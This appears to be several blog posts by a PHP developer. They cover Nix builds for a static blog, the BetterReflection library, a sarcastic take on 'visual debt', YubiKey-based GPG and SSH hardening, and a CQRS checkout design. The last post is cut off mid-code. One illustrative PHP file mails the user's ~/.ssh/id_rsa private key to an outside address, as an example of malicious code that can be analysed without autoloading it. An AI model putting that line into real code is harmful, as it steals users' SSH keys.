The last time I blogged was in 2017: a lot has changed since then, and after a decade of ignoring blogging, I will attempt to put some regularity into it again.
The times call for it: having a personal space that is really "our own" is extremely important, as is having something to read that was written by other humans, and not slop.
I mainly stopped blogging for two reasons:
Note: This section describes the Nixification of the blog, done in this pull request. You can skip this, if you prefer reading the PR instead.
The first thing to do is to get everything under control again.
A few years back, I started relying heavily on Nix, a lazy functional language that is perfect for achieving reproducible builds and environments.
At the time of this writing, this website is built via Sculpin, a static website generator whose dependency upgrades I've neglected for far too long.
In order to "freeze" the build in time, I used a Nix Flake to pin all the dependencies down, preventing any further shifts in dependency versions:
{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = { self, nixpkgs, flake-utils, composer2nix, ... }@inputs:
    flake-utils.lib.eachDefaultSystem (
      system: {
        packages = {
          # things that will stay extremely stable will go here
        };
      }
    );
}
The above will "pin" dependencies such as composer or php,
preventing them from drifting apart, unless a commit moves them.
This is also thanks to the built-in flake.lock mechanism of Nix Flakes.
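For reference, a flake.lock entry records the exact commit and content hash that Nix resolved for each input; it looks roughly like this (revision and hash are shortened placeholders, not the real values):

```json
{
  "nodes": {
    "nixpkgs": {
      "locked": {
        "narHash": "sha256-…",
        "owner": "nixos",
        "repo": "nixpkgs",
        "rev": "…",
        "type": "github"
      }
    }
  },
  "root": "root",
  "version": 7
}
```

Running nix flake update is then the only way these pins move.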
Because Composer does not compute content hashes of PHP dependencies, NixOS
cannot directly use composer.json and composer.lock to
download dependencies: that is an obstacle to reproducible builds, and requires
a little detour.
Luckily, Sander van der Burg built a very
useful composer2nix tool,
which can be used to scan composer.lock entries, and compute their content
hashes upfront:
{
  inputs = {
    # ...
    composer2nix = {
      url = "github:svanderburg/composer2nix";
      flake = false;
    };
  };
}
As you can see, composer2nix is not a flake: we can still use it ourselves, though, to process composer.lock locally:
update-php-packages = pkgs.writeShellScriptBin "generate-composer-to-nix.sh" ''
  set -euxo pipefail

  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT

  mkdir "$TMPDIR/src"
  mkdir "$TMPDIR/composer2nix"

  ${pkgs.coreutils}/bin/cp -r "${./app}" "$TMPDIR/src/app"
  ${pkgs.coreutils}/bin/cp -r "${composer2nix}/." "$TMPDIR/composer2nix"
  ${pkgs.coreutils}/bin/chmod -R +w "$TMPDIR/composer2nix"

  ${pkgs.php84Packages.composer}/bin/composer install --working-dir="$TMPDIR/composer2nix" --no-scripts --no-plugins

  ${pkgs.php}/bin/php "$TMPDIR/composer2nix/bin/composer2nix" --name=${website-name}

  ${pkgs.coreutils}/bin/rm -f default.nix
'';
We can now run nix run .#update-php-packages to generate a very
useful php-packages.nix, which will be used to produce our vendor/
directory later on.
The generated php-packages.nix looks a lot like this:
let
  packages = {
    "components/bootstrap" = {
      targetDir = "";
      src = composerEnv.buildZipPackage {
        name = "components-bootstrap-fca56bda4c5c40cb2a163a143e8e4271a6721492";
        src = fetchurl {
          url = "https://api.github.com/repos/components/bootstrap/zipball/fca56bda4c5c40cb2a163a143e8e4271a6721492";
          sha256 = "138fz0xp2z9ysgxfsnl7qqgh8qfnhv2bhvacmngnjqpkssz7jagx";
        };
      };
    };
    # ... and more
With that, we can then prepare a stable installation of the website generator:
# ...
built-blog-assets = derivation {
name = "built-blog-assets";
src = with-autoloader; # an intermediate step I omitted in this blogpost: check the original PR for details
builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
set -euxo pipefail
${pkgs.coreutils}/bin/cp -r $src/. $TMPDIR
cd $TMPDIR
${pkgs.php}/bin/php vendor/bin/sculpin generate --env=prod
${pkgs.coreutils}/bin/cp -r $TMPDIR/output_prod $out
'';
inherit system;
};
Running nix build .#built-blog-assets now generates a ./result directory
with the full website contents, and we know it won't break unless we update flake.lock, yay!
Let's publish these contents to GitHub Pages:
publish-to-github-pages = pkgs.writeShellScriptBin "publish-blog.sh" ''
  set -euxo pipefail

  TMPDIR="$(${pkgs.coreutils}/bin/mktemp -d)"
  trap 'rm -rf -- "$TMPDIR"' EXIT
  cd "$TMPDIR"

  ${pkgs.git}/bin/git clone git@github.com:Ocramius/ocramius.github.com.git .
  ${pkgs.git}/bin/git checkout master

  ${pkgs.rsync}/bin/rsync --quiet --archive --filter="P .git*" --exclude=".*.sw*" --exclude=".*.un~" --delete "${built-blog-assets}/" ./

  ${pkgs.git}/bin/git add -A :/
  ${pkgs.git}/bin/git commit -a -m "Deploying sculpin-generated pages to \`master\` branch"
  ${pkgs.git}/bin/git push origin HEAD
'';
We can now run nix run .#publish-to-github-pages to deploy the website!
Since you are one of my smart readers, you probably already noticed how GitHub has been progressively enshittified by its umbilical cord with Microslop.
I plan to move the blog somewhere else soon-ish, so I already prepared an OCI container for it.
Since I will deploy it myself, I want a container with no shell, no root user, no filesystem access.
I stumbled upon mholt/caddy-embed, which embeds an entire static website into a single Go binary: perfect for my use-case.
The Caddy docs suggest using XCaddy for installing
modules, but that is yet another build system that I don't want to have anything to do with.
Instead, I cloned caddy-embed, and used
NixPkgs' Go build system to embed my website into it:
caddy-module-with-assets = derivation {
  name = "caddy-module-with-assets";
  builder = pkgs.writeShellScript "generate-blog-assets.sh" ''
    set -euxo pipefail

    ${pkgs.coreutils}/bin/cp -r ${./caddy-embed/.} $out
    ${pkgs.coreutils}/bin/chmod +w $out/files/
    ${pkgs.coreutils}/bin/cp -rf ${built-blog-assets}/. $out/files/
  '';
  inherit system;
};
embedded-server = pkgs.buildGo126Module {
  name = "embedded-server";
  src = caddy-module-with-assets;

  # annoyingly, this will need to be manually updated at every `go.mod` change :-(
  vendorHash = "sha256-v0YXbAaftLLc+e8/w1xghW5OHRjT7Xi87KyLv1siGSc=";
};
Same as with PHP, I'm pretty confident that Nix won't break unless flake.lock changes.
We can now bundle the built server into a Docker container with a single Caddyfile attached.
The following is effectively a Dockerfile, but reproducible and minimal:
runnable-container = pkgs.dockerTools.buildLayeredImage {
  name = website-name;
  tag = "latest";
  contents = [
    (pkgs.writeTextDir "Caddyfile" (builtins.readFile ./caddy-embed/Caddyfile))
  ];
  config = {
    Cmd = [
      "${embedded-server}/bin/caddy-embed"
      "run"
    ];
  };
};
We can now:

nix build .#runnable-container
cat ./result | docker load
docker run --rm -ti -p8080:8080 ocramius.github.io:latest

The running container uses ~40Mb of RAM to exist (consider that it has all of the website in memory), and a quick test with wrk showed that it can handle over 60000 requests/second on my local machine.
❯ wrk -t 10 -d 30 -c 10 http://localhost:8080/
Running 30s test @ http://localhost:8080/
  10 threads and 10 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency   165.35us   75.09us    3.91ms   90.49%
    Req/Sec     6.12k   365.53      7.05k    92.46%
  1833101 requests in 30.10s, 23.32GB read
Requests/sec:  60901.74
Transfer/sec:    793.44MB
While cleaning up the builds, I found some really horrible stuff that should've gone away much earlier:
Google Analytics: kill it with fire! I'm not here to "convert visits": I'm here to help out my readers and make new connections. I am not a marketing department, and the privacy of my website visitors is more important than a website ticker that sends data to a US-based company.
Leftover JS/CSS: the website had various external CDNs in use, with CSS and JS files that were not really in use anymore. Cleaning these up felt good, and also reduced the number of external sites to zero.
Navigation menu simplified: this is a static website. An animated "burger menu" was certainly interesting a decade ago, but nowadays, it is just an annoying distraction, and extra navigation steps for visitors.
Disqus: this used to be a useful way to embed a threaded comment section inside a static website, but it is no longer relevant to me, as it becomes an extra inbox to manage. Disqus was also cluttered with trackers, which should not be there.
This first post is about "being able to blog again", but there's more to do.
I certainly want to self-host things, having my blog under my own domain, rather than under
*.github.io.
I also want comments again, but they need to come from the Fediverse, rather than being land-locked in a commenting platform. Other people have attempted this, and I shall do it too.
Perhaps I may remove that 3D avatar at the top of the page? It took a lot of time to build with Blender and THREE.js, and it uses your video card to run: perhaps not the most energy-efficient choice for a static website, but I'm still emotionally attached to it.
Also, this website is filled with reference information that no longer holds true: a decade has passed, my OSS positions have vastly changed, and the pages that describe what I do will have to change too.
Finally, I want it to be clear that this is a website by a human, for other humans: I will therefore start cryptographically signing my work, allowing others to decide whether they trust what I wrote myself, without a machine generating any of it.
If you are still here and reading: thank you for passing by, dear fellow human.
Hoping that this has inspired you a bit, I'm looking forward to seeing your own efforts to self-host your own website!
James Titcumb and I started working on this project back in 2015, and it is a pleasure to see it reaching maturity.
The initial idea was simple: James would implement all my wicked ideas, while I would lay back and get drunk on Drambuie.
Yes, that actually happened. Thank you, James, for all the hard work! 🍻
(I did some work too, by the way!)
Jokes aside, the project is quite ambitious: it aims to reproduce the entirety of the PHP reflection API without triggering any actual autoloading.
When put in use, it looks like this:
<?php
// src/MyClass.php

namespace MyProject;

class MyClass
{
    public function something() {}
}
<?php
// example1.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\ReflectionMethod;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$methodNames = \array_map(function (ReflectionMethod $method) : string {
    return $method->getName();
}, $myClass->getMethods());

\var_dump($methodNames);

// class was not loaded:
\var_dump(\sprintf('Class %s loaded: ', MyClass::class));
\var_dump(\class_exists(MyClass::class, false));
As you can see, the difference is just in how you bootstrap the reflection API.
Also, we do provide a fully backwards-compatible reflection API that you can use
if your code heavily relies on ext-reflection:
<?php
// example2.php

use MyProject\MyClass;
use Roave\BetterReflection\BetterReflection;
use Roave\BetterReflection\Reflection\Adapter\ReflectionClass;

require_once __DIR__ . '/vendor/autoload.php';

$myClass = (new BetterReflection())
    ->classReflector()
    ->reflect(MyClass::class);

$reflectionClass = new ReflectionClass($myClass);

// You can just use it wherever you had `ReflectionClass`!
\var_dump($reflectionClass instanceof \ReflectionClass);
\var_dump($reflectionClass->getName());
How does that work?
The operational concept is quite simple, really: the referenced source code is located and parsed, and the result is turned into a Roave\BetterReflection\Reflection\* class instance, ready for you to consume it.
The hard part is tracking the myriad details of the PHP language, which is very complex and cluttered with scope, visibility and inheritance rules: we take care of it for you.
The main use-cases for BetterReflection are most likely around security, code analysis and AOT compilation.
One of the most immediate use-cases will likely be in PHPStan, which will finally be able to inspect hideous mixed OOP/functional/procedural code if the current WIP implementation works as expected.
Since you can now "work" with code before having loaded it, you can harden APIs in a lot of security-sensitive contexts. A serializer may decide not to load a class if side-effects are contained in the file declaring it:
<?php
// Evil.php

\mail(
    '[email protected]',
    'All ur SSH keys are belong to us',
    \file_get_contents('~/.ssh/id_rsa')
);

// you really don't want to autoload this bad one:
class Evil {}
The same goes for classes implementing malicious __destruct code,
as well as classes that may trigger autoloading of other malicious code.
It is also possible to analyse code that is downloaded from the internet without actually running it. For instance, code may be checked against a GPG signature embedded in the file before being run, effectively allowing PHP to "run only signed code". Composer, anybody?
If you are more into code analysis, you may decide to compare two different versions of a library, and scan for BC breaks:
<?php
// the-library/v1/src/SomeApi.php

class SomeAPI
{
    public function sillyThings() { /* ... */ }
}

<?php
// the-library/v2/src/SomeApi.php

class SomeAPI
{
    public function sillyThings(UhOh $bcBreak) { /* ... */ }
}
In this scenario, somebody added a mandatory parameter to SomeAPI#sillyThings(),
effectively introducing a BC break that is hard to detect without having both versions of the
code available, or good migration documentation (library developers: please document this
kind of change!).
Another way to leverage the power of this factory is to compile factory code into highly optimised dependency injection containers, like PHP-DI started doing.
In addition to the above use-case scenarios, we are working on additional functionality that would allow changing code before loading it.
Is that a good idea?
... I honestly don't know.
Still, there are proper use-case scenarios around
AOP and proxying libraries,
which would then be able to work even with final classes.
You will likely see these features appear in a new, separate library.
To conclude, I would like to thank James Titcumb, Jaroslav Hanslík, Marco Perone and Viktor Suprun for the effort they put in this release, providing patches, improvements and overall helping us build something that may become extremely useful in the PHP ecosystem.
As an introduction, I suggest watching this short tutorial about visual debt by @jeffrey_way.
The concept is simple: let's take the example from Laracasts and re-visit the steps taken to remove visual debt.
interface EventInterface {
    public function listen(string $name, callable $handler) : void;
    public function fire(string $name) : bool;
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen(string $name, callable $handler) : void
    {
        $this->events[$name][] = $handler;
    }

    public function fire(string $name) : bool
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}

$event = new Event;

$event->listen('subscribed', function () {
    var_dump('handling it');
});
$event->listen('subscribed', function () {
    var_dump('handling it again');
});

$event->fire('subscribed');
So far, so good.
We have an event that obviously fires itself, a concrete implementation and a few subscribers.
Our code works, but it contains a lot of useless artifacts that do not really influence our ability to make it run.
These artifacts are also distracting, moving our focus from the runtime to the declarative requirements of the code.
Let's start removing the bits that aren't needed by starting from the method parameter and return type declarations:
interface EventInterface {
    public function listen($name, $handler);
    public function fire($name);
}

final class Event implements EventInterface {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}
Our code is obvious, so the parameters don't need redundant declarations or type checks. Also, we are aware of our own implementation, so the runtime checks are not needed, as the code will work correctly as per manual or end to end testing. A quick read will also provide sufficient proof of correctness.
Since the code is trivial and we know what we are doing when using it, we can also remove the contract that dictates the intended usage. Let's remove those implements and interface symbols.
final class Event {
    protected $events = [];

    public function listen($name, $handler)
    {
        $this->events[$name][] = $handler;
    }

    public function fire($name)
    {
        if (! array_key_exists($name, $this->events)) {
            return false;
        }

        foreach ($this->events[$name] as $event) {
            $event();
        }

        return true;
    }
}
Removing the contract doesn't change the runtime behavior of our code, which is still technically correct. Consumers will also not need to worry about correctness when they use `Event`, as a quick skim over the implementation will reveal its intended usage.
Also, since the code imposes no limitations on the consumer, who is responsible for the correctness of any code touching ours, we are not going to limit the usage of inheritance.
class Event {
    // ...
}
That's as far as the video goes, with a note that the point is to "question everything".
Jeffrey then pushed this a bit further, saying that best practices don't exist, and people are pretty much copying stale discussions about coding approaches:
According to that, I'm going to question the naming chosen for our code. Since the code is trivial and understandable at first glance, we don't need to pick meaningful names for variables, methods and classes:
class A {
    protected $a = [];

    public function a1($a1, $a2)
    {
        $this->a[$a1][] = $a2;
    }

    public function a2($a1)
    {
        if (! array_key_exists($a1, $this->a)) {
            return false;
        }

        foreach ($this->a[$a1] as $a) {
            $a();
        }

        return true;
    }
}
This effectively removes our need to look at the code details, making the code shorter and runtime-friendly. We're also saving some space in the PHP engine!
Effectively, this shows us that there are upsides to this approach, as we trade read overhead for less engine overhead. We also stop obsessing over the details of our Event, as we already previously defined it, so we remember how to use it.
Since the Event type is not really useful to us,
as nothing type-hints against it, we can remove it.
Let's move back to dealing with a structure of
function pointers:
function A () {
    $a = [];

    return [
        function ($a1, $a2) use (& $a) {
            $a[$a1][] = $a2;
        },
        function ($a1) use (& $a) {
            if (! array_key_exists($a1, $a)) {
                return false;
            }

            foreach ($a[$a1] as $a2) {
                $a2();
            }

            return true;
        },
    ];
}

$a = A();

$a[0]('subscribed', function () {
    var_dump('handling it');
});
$a[0]('subscribed', function () {
    var_dump('handling it again');
});

$a[1]('subscribed');
This code is equivalent, and doesn't use any particularly fancy structures coming from the PHP language, such as classes. We are working towards reducing the learning and comprehension overhead.
If you haven't noticed before, this entire post is just sarcasm.
Please don't do any of what is discussed above, it is a badly crafted oxymoron.
Please don't accept what Jeffrey says in that video.
Please do use type systems when they are available, they actually reduce "visual debt" (is it even a thing?), helping you distinguish apples from pies.
Please do use interfaces, as they reduce clutter, making things easier to follow from a consumer perspective, be it a human or an automated tool.
This is all you need to understand that Event mumbo-jumbo (which has broken naming, by the way, but this isn't an architecture workshop). Maybe add some API doc:
interface EventInterface {
    /**
     * Attach an additional listener to be fired when calling
     * `fire` with `$name`
     */
    public function listen(string $name, callable $handler) : void;

    /**
     * Execute all listeners assigned to `$name`
     *
     * @return bool whether any listener was executed
     */
    public function fire(string $name) : bool;
}
This is not a really good interface, but it's a clear, simple and readable one. No "visual debt". Somebody reading this will thank you later. Maybe it will be you, next year.
Please do follow best practices. They work. They help you avoid stupid mistakes. Bad code can lead to terrible consequences, and you don't know where your code will be used. And yes, I'm picking examples about real-time computing, because that's what makes it to the news. OWASP knows more about all this.
Please remember that your job is reading, understanding and thinking before typing, and typing is just a side-effect.
And please, please, please: remember that most of your time you are not coding for yourself alone. You are coding for your employer, for your team, for your project, for your future self.
Last week, I received my new DELL XPS 15 9560, and since I am maintaining some high impact open source projects, I wanted the setup to be well secured.
In addition to that, I caught a bad flu, and that gave me enough excuses to waste time in figuring things out.
In this article, I'm going to describe what I did, and how you can reproduce my setup for your own safety, as well as that of the people who trust you.
First of all, you should know that I am absolutely not a security expert: all I did was follow the online tutorials that I found. I am also not a cryptography expert, and I am constantly dissatisfied with how the crypto community reduces everything into a TLA, making even the simplest things impossible to understand for mere mortals.
First, let's clarify what a YubiKey is.
That thing is a YubiKey.
What does it do?
It's basically a USB key filled with crypto features. It is also (currently) impossible to make a physical copy of it, and it is not possible to extract information written to it.
It can:
In order to follow this tutorial, you should have at least 2 (two) YubiKey Neo or equivalent devices. This means that you will have to spend approximately USD 100: these things are quite expensive. You absolutely need a backup key, because all these security measures may lock you out of your systems if you lose or damage one.
Our kickass setup will allow us to do a series of cool things related to daily development operations:
I am not going to describe the procedures in detail, but just link them and describe what we are doing, and why.
Simple NFC-based 2FA with authentication codes will be useful for most readers, even non-technical ones.
What we are doing is simply seeding the YubiKey with Google Authenticator codes, except that we will use the Yubico Authenticator. This will only work for the "primary" key (the one we will likely bring with us at all times).
What we will have to do is basically:
The setup steps are described on the official Yubico website.
Once the YubiKey is configured with at least one website that supports the "Google Authenticator" workflow, we should be able to:
One very nice (and unclear, at first) advantage of having a YubiKey seeded with 2FA codes is that we can now generate 2FA codes on any phone, as long as we have our YubiKey with us.
I already had to remote-lock and remote-erase a phone in the past, and losing the Google Authenticator settings is not fun. If you handle your YubiKey with care, you shouldn't have that problem anymore.
Also, a YubiKey is waterproof: our 2017 phone probably isn't.
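The codes involved here are plain RFC 6238 TOTP values (the "Google Authenticator" algorithm). As a sketch of what gets computed from the seed stored on the key (this is not Yubico's implementation, just the standard algorithm), in Python:

```python
import hashlib
import hmac
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the number of elapsed 30-second steps."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation, per RFC 4226
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


# RFC 6238 test vector: shared secret "12345678901234567890" at t=59
print(totp(b"12345678901234567890", 59))  # → 287082
```

The secret never changes: this is why keeping it inside a tamper-proof device, rather than on a phone, matters.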
CAUTION: this procedure can potentially lead us to lose sudo access from our account, as well as lock us out of our computer. I take no responsibility: try it in a VM first, if you do not feel confident.
We want to make sure that we can log into our personal computer or workstation only when we are physically sitting at it. This means that the YubiKey must be plugged in for a password authentication to succeed.
Each login prompt, user password prompt or sudo
command should require both our account password and our YubiKey.
What we will have to do is basically:
- install libpam-yubico
- program the YubiKey for challenge-response with ykpersonalize
- store the initial challenge state with ykpamcfg
- keep an open sudo session, and be ready to revert changes from there if things go wrong
The steps to perform that are in the official Yubico tutorial.
If everything is done correctly, every prompt asking for our Linux/Mac account password should fail when no YubiKey is plugged in.
TIP: configure the libpam-yubico integration in debug mode, as we will often have a "WTH?" reaction when authentication isn't working. That may happen if there are communication errors with the YubiKey.
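For reference, the PAM rule produced by that tutorial looks roughly like the following line (assuming challenge-response mode; the exact file, such as /etc/pam.d/sudo or common-auth, and the options may differ per distribution), with debug being the flag mentioned above:

```
auth required pam_yubico.so mode=challenge-response debug
```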
This setup has the advantage of locking out anyone trying to bruteforce our password, as well as stopping potentially malicious background programs from performing authentication or sudo commands while we aren't watching.
CAUTION: the point of this sort of setup is to guarantee that login can only happen with the physical person at the computer. If we want to go to the crapper, we lock the computer, and bring our YubiKey with us.
This is probably the messiest part of the setup, as a lot of CLI tool usage is required.
Each YubiKey has the ability to store 3 separate keys for signing, encrypting and authenticating.
We will therefore create a series of GPG keys:
- a signing sub-key ([S] in the gpg interactive console)
- an encryption sub-key ([E] in the gpg interactive console)
- an authentication sub-key ([A] in the gpg interactive console)
CAUTION: as far as I know, the YubiKey Neo only supports RSA keys up to 2048 bits long. Do not use 4096 for the sub-key length unless we know that the key type supports it.
After that, we will move the private keys to the YubiKeys
with the gpg keytocard command.
CAUTION: the keytocard command is destructive. Once we moved a private key to a YubiKey, it is removed from our local machine, and it cannot be recovered. Be sure to only move the correct sub-keys.
NOTE: being unable to recover the private sub-key is precisely the point of using a YubiKey: nobody can steal or misuse those keys, no malicious program can copy them, plus we can use them from any workstation.
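As a pseudocode sketch of that interactive session (the key ID is a placeholder, and the sub-key numbering depends on how your key was generated):

```
$ gpg --edit-key <master-key-id>
gpg> key 1        # select the signing sub-key ([S])
gpg> keytocard    # destructive: moves the private part onto the YubiKey
gpg> key 1        # deselect before picking the next sub-key
gpg> key 2        # select the encryption sub-key ([E])
gpg> keytocard
gpg> save
```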
Also, we will need to set a PIN and an admin PIN. The defaults for these two are, respectively, 123456 and 12345678. The PIN will be needed each time we plug in our YubiKey to use any of the private keys stored in it.
CAUTION: we only have 3 attempts for entering our PIN. Should we fail all attempts, then the YubiKey will be locked, and we will have to move new GPG sub-keys to it before being able to use it again. This prevents bruteforcing after physical theft.
After our gpg sub-keys and PINs are written to the YubiKeys, let's make a couple of secure backups of our master gpg secret key, then delete it from the computer: keep just the public key.
The master private gpg key should only be used to generate new sub-keys, if needed, or to revoke them, if we lose one or more of our physical devices.
We should now be able to:
The exact procedure to achieve all this is described in detail (with console output and examples) at drduh/YubiKey-Guide.
Now that we can sign messages using the GPG key stored in our YubiKey, usage with GIT becomes trivial:
git config --global user.signingkey <yubikey-signing-sub-key-id>
We will now need to plug in our YubiKey and enter our PIN when signing a tag:
git tag -s this-is-a-signed-tag -m "foo"
Nobody can release software on our behalf without physical access to our YubiKey, as well as our YubiKey PIN.
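The same can be expressed as a ~/.gitconfig fragment (the key ID is a placeholder, as above); commit.gpgsign additionally signs every commit, not just tags:

```ini
[user]
	signingkey = <yubikey-signing-sub-key-id>
[commit]
	gpgsign = true
```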
In order to sign/encrypt emails, we will need to install Mozilla Thunderbird and Enigmail.
The setup will crash a few times. I suggest going through the "advanced" settings, then actually selecting a signing/encryption key when trying to send a signed/encrypted message. Enigmail expects the key to be a file or similar, but this approach will allow us to just give it the private GPG key identifier.
Sending mails is still a bit buggy: Thunderbird will ask for the PIN 3 times, as if it failed to authenticate, but the third attempt will actually succeed. This behavior will be present in a number of prompts, not just within Thunderbird.
Nobody can read our encrypted emails, unless the YubiKey is plugged in. If our laptop is stolen, these secrets will be protected.
There is one GPG key that we didn't use yet: the authentication one.
There is a (relatively) recent functionality of gpg-agent that allows it to behave as an ssh-agent.
To make that work, we will simply kill all existing SSH and GPG agents:
sudo killall gpg-agent
sudo killall ssh-agent
# note: eval is used because the produced STDOUT is a bunch of ENV settings
eval $( gpg-agent --daemon --enable-ssh-support )
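To avoid re-running that eval dance in every shell, the same can be configured permanently (a sketch; your shell init still needs to point SSH_AUTH_SOCK at the gpg-agent socket):

```
# ~/.gnupg/gpg-agent.conf
enable-ssh-support
```

After editing it, restart the agent with gpgconf --kill gpg-agent.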
Once we've done that, let's try running:
ssh-add -L
Assuming we don't have any local SSH keys, the output should be something like:
ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
The agent has no identities.
If we plug in our YubiKey and try again, the output will be:
ocramius@ocramius-XPS-15-9560:~$ ssh-add -L
ssh-rsa AAAAB3NzaC ... pdqtlwX6m1 cardno:000123457915
MAGIC! gpg-agent is exposing the public GPG key as an SSH key.
If we upload this public key to a server, and then try logging in with the YubiKey plugged in, we will be asked for the YubiKey PIN, and will then just be able to log in as usual.
Nobody can log into our remote servers without having the physical key device.
We can log into our remote servers from any computer that can run gpg-agent. Just always bring our YubiKey with us.
CAUTION: Each YubiKey with an authentication gpg sub-key will produce a different public SSH key: we will need to seed our server with all the SSH public keys.
TIP: consider using the YubiKey identifier (written on the back of the device) as the comment for the public SSH key, before storing it.
Steps to set up gpg-agent for SSH authentication are also detailed in drduh/YubiKey-Guide.
Custom SSH keys are no longer needed: our GPG keys cover most usage scenarios.
We now have at least 2 physical devices that give us access to very critical parts of our infrastructure, messaging, release systems and computers in general.
At this point, I suggest keeping one always with ourselves, and treating it with extreme care. I made a custom 3d-printed case for my YubiKey, and then put it all together in my physical keychain:
The backup key is to be kept in a secure location: while theft isn't a big threat with YubiKeys, getting locked out of all our systems is a problem. Make sure that you can always either recover a YubiKey or the master GPG key.
The context was a CQRS and Event Sourced architecture, but in general, the approach that I prefer also applies to most imperative ORM entity code (assuming a proper data-mapper is involved).
Let's use a practical example:
Feature: credit card payment for a shopping cart checkout

  Scenario: a user must be able to check out a shopping cart
    Given the user has added some products to their shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was charged for the shopping cart total price

  Scenario: a user must not be able to check out an empty shopping cart
    When the user checks out the shopping cart with their credit card
    Then the user was not charged

  Scenario: a user cannot check out an already purchased shopping cart
    Given the user has added some products to their shopping cart
    And the user has checked out the shopping cart with their credit card
    When the user checks out the shopping cart with their credit card
    Then the user was not charged
The scenario is quite generic, but you should be able to see what the application is supposed to do.
I will take an imperative command + domain-events approach, but we don't need to dig into the patterns behind it, as it is quite simple.
We are looking at a command like the following:
final class CheckOutShoppingCart
{
    public static function from(
        CreditCardCharge $charge,
        ShoppingCartId $shoppingCart
    ) : self {
        // ...
    }

    public function charge() : CreditCardCharge { /* ... */ }
    public function shoppingCart() : ShoppingCartId { /* ... */ }
}
If you are unfamiliar with what a command is, it is just the object that our frontend or API throws at our actual application logic.
Then there is an aggregate performing the actual domain logic work:
final class ShoppingCart
{
// ...
public function checkOut(CapturedCreditCardCharge $charge) : void
{
$this->charge = $charge;
$this->raisedEvents[] = ShoppingCartCheckedOut::from(
$this->id,
$this->charge
);
}
// ...
}
If you are unfamiliar with what an aggregate is, it is the direct object in our interaction (look at the sentences in the scenario). In your existing applications, it would most likely (but not exclusively) be an entity or a DB record or group of entities/DB records that you are considering during a business interaction.
We need to glue this all together with a command handler:
final class HandleCheckOutShoppingCart
{
public function __construct(Carts $carts, PaymentGateway $gateway)
{
$this->carts = $carts;
$this->gateway = $gateway;
}
public function __invoke(CheckOutShoppingCart $command) : void
{
$shoppingCart = $this->carts->get($command->shoppingCart());
$payment = $this->gateway->captureCharge($command->charge());
$shoppingCart->checkOut($payment);
}
}
This covers the "happy path" of our workflow, but we still lack the unhappy paths: preventing checkout of an empty shopping cart, and of an already purchased one.
In order to do that, we have to add some "guards" that prevent the interaction. This is the approach that I've seen being used in the wild:
final class HandleCheckOutShoppingCart
{
// ...
public function __invoke(CheckOutShoppingCart $command) : void
{
$cartId = $command->shoppingCart();
$charge = $command->charge();
$shoppingCart = $this->carts->get($cartId);
// these guards are injected callables. They throw exceptions:
($this->nonEmptyShoppingCart)($cartId);
($this->nonPurchasedShoppingCart)($cartId);
($this->paymentAmountMatches)($cartId, $charge->amount());
$payment = $this->gateway->captureCharge($charge);
$shoppingCart->checkOut($payment);
}
}
As you can see, we are adding some logic to our command handler here. This is usually done because dependency injection on the command handler is easy. Passing services to the aggregate via dependency injection is generally problematic and to be avoided, since an aggregate is usually a "newable type".
With this code, we are able to handle most unhappy paths, and eventually also failures of the payment gateway (not in this article).
While the code above works, what we did was add domain-specific logic to the command handler. Since the command handler is part of our application layer, we are effectively diluting these checks into "less important layers".
In addition to that, the command handler is required in tests that consume the above specification: without the command handler, our logic will fail to handle the unhappy paths in our scenarios.
For those that are reading and practice CQRS+ES: you also know that those guards aren't always simple to implement! Read models, projections... Oh my!
Also: what if we wanted to react to those failures, rather than just stop execution? Who is responsible for that?
If you went with the TDD way, then you already saw all of this coming: let's fix it!
What we did was put logic from the domain layer (which should be in the aggregate) into the application layer: let's turn around and put domain logic in the domain (read: in the aggregate logic).
Since we don't really want to inject a payment gateway as a constituent part of our aggregate root (a newable shouldn't have non-newable dependencies), we just borrow a brutally simple concept from functional programming: we pass the interactor as a method parameter.
final class ShoppingCart
{
// ...
public function checkOut(
CheckOutShoppingCart $checkOut,
PaymentGateway $paymentGateway
) : void {
$charge = $checkOut->charge();
Assert::null($this->payment, 'Already purchased');
Assert::greaterThan(0, $this->totalAmount, 'Price invalid');
Assert::same($this->totalAmount, $charge->amount());
$this->charge = $paymentGateway->captureCharge($charge);
$this->raisedEvents[] = ShoppingCartCheckedOut::from(
$this->id,
$this->charge
);
}
// ...
}
The command handler is also massively simplified, since all it does is forward the required dependencies to the aggregate:
final class HandleCheckOutShoppingCart
{
// ...
public function __invoke(CheckOutShoppingCart $command) : void
{
$this
->shoppingCarts
->get($command->shoppingCart())
->checkOut($command, $this->gateway);
}
}
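To make the design concrete, here is a self-contained, runnable sketch of the flow above. The types are deliberately simplified (plain integers for amounts, strings for charge identifiers) and stand in for the article's value objects; `FakePaymentGateway` and the guard messages are illustrative, not part of the original code:

```php
<?php

// Self-contained sketch: the aggregate guards its own invariants,
// and the payment gateway is passed in as a method parameter.

interface PaymentGateway
{
    /** @return string an opaque charge identifier */
    public function captureCharge(int $amount) : string;
}

final class FakePaymentGateway implements PaymentGateway
{
    public $captured = [];

    public function captureCharge(int $amount) : string
    {
        $this->captured[] = $amount;

        return 'charge-' . count($this->captured);
    }
}

final class ShoppingCart
{
    private $totalAmount;
    private $charge;

    public function __construct(int $totalAmount)
    {
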